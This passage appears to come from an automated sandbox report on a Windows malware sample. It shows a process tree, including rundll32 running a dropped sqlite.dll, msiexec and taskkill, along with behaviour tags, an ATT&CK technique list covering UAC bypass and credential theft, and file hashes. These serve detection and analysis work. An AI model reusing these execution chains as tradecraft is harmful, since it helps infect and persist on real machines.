                                                                                                                                                                                                                                                      PID:2164
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:8196
                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                      PID:7912
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:8412
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4500
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\44AC.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\44AC.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:7920
                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                        PID:7184
                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:6084
                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        PID:7376
                                                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211013-0535.dm
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:8104
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                          PID:6268
                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:4736
                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding BE163B0B439CC28E289DDD734B1EE403 C
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:808
                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding ECF40DE290BD74EB920D2E1892E2C599
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:7580
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:8340
                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 5760F4760EE351D32797729B665CB71B E Global\MSI0000
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:8188
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:2016
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:8440
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:8492
                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:8572
                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:9040
                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:5728
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  PID:2084
                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                  PID:4248
                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:8300
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                    PID:6448
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                    PID:8720
                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:8620
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                      PID:6852
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                      PID:5080
                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8676
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                        PID:7832
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        PID:6580
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                        PID:6840
                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                        PID:4004
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                        PID:6772
                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:3984
                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7256
                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:4572
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:7896
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:6100

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1197

                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                          Bypass User Account Control

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1088

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                          9
                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                          Bypass User Account Control

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1088

                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1197

                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1518

                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                          Security Software Discovery

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1063

                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                          Email Collection

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1114

                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9d8943b42e7f926a62fc7b9acf703027

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            816cb627d8e6dca46f23555bbf2189987ee8f9fb

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            6693fc6ff371413243f434b49ac4ab29fbb0955937a6a023d3dbe143879a2f0d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4cb6df21a256e8d66553a110828ce0624f776cc3bd608e07d31db4ee4ea9caeaec0991c2e3080908c835cd96eac905575696f5da8da181af623c0f7db0dc6e3d

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9d8943b42e7f926a62fc7b9acf703027

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            816cb627d8e6dca46f23555bbf2189987ee8f9fb

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            6693fc6ff371413243f434b49ac4ab29fbb0955937a6a023d3dbe143879a2f0d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4cb6df21a256e8d66553a110828ce0624f776cc3bd608e07d31db4ee4ea9caeaec0991c2e3080908c835cd96eac905575696f5da8da181af623c0f7db0dc6e3d

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon203f01ac7e6.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5274c2ef1482b089970b8b606f7988b1

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            9445cb81692efb96cdf774512c2aa388ae103f26

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            235a9ab0c25a3ffb134ac3a1eca188b30adcc37fe8e2724527ea8087b65ba5a3

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            d72b0519d27225f0cd1e4efbf910cc1e82b7541b1954bf4e05d2eb1935f19025ff7689d5ed47e786241fd015a2a885fcd07a85e04b43505081e87b2b76a52835

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon204014f13870f5e.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5274c2ef1482b089970b8b606f7988b1

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            9445cb81692efb96cdf774512c2aa388ae103f26

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            235a9ab0c25a3ffb134ac3a1eca188b30adcc37fe8e2724527ea8087b65ba5a3

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            d72b0519d27225f0cd1e4efbf910cc1e82b7541b1954bf4e05d2eb1935f19025ff7689d5ed47e786241fd015a2a885fcd07a85e04b43505081e87b2b76a52835

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon206b909958ed4.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            e7326b681ce6557f0cdd5a82797c07d5

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            49883439bc8a8f77f1dddda57328e44f9b7a5cf3

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            6bbe1cc1031645239272fba24242ed0da5f3214420d2fde359abec3c9bc52636

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            9ce778312111d678bd09ea8a5174c632184c4ae52e5757f856478dcea5249212892888957a716ef7de17449d04772dc4fa06bf048134c38948bc4d66c82de9c8

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon206b909958ed4.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            e7326b681ce6557f0cdd5a82797c07d5

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            49883439bc8a8f77f1dddda57328e44f9b7a5cf3

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            6bbe1cc1031645239272fba24242ed0da5f3214420d2fde359abec3c9bc52636

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            9ce778312111d678bd09ea8a5174c632184c4ae52e5757f856478dcea5249212892888957a716ef7de17449d04772dc4fa06bf048134c38948bc4d66c82de9c8

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC85035C5\Mon206d48916f93c5.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d082843d4e999ea9bbf4d89ee0dc1886

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            4e2117961f8dac71dde658a457fb6a56d5a6f1aa

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            0f3822efa9fa3fcb532a043df68175865eca68a2805b1415d0d89de69a49628b

                                                                                                                                                                                                                                                                            SHA512

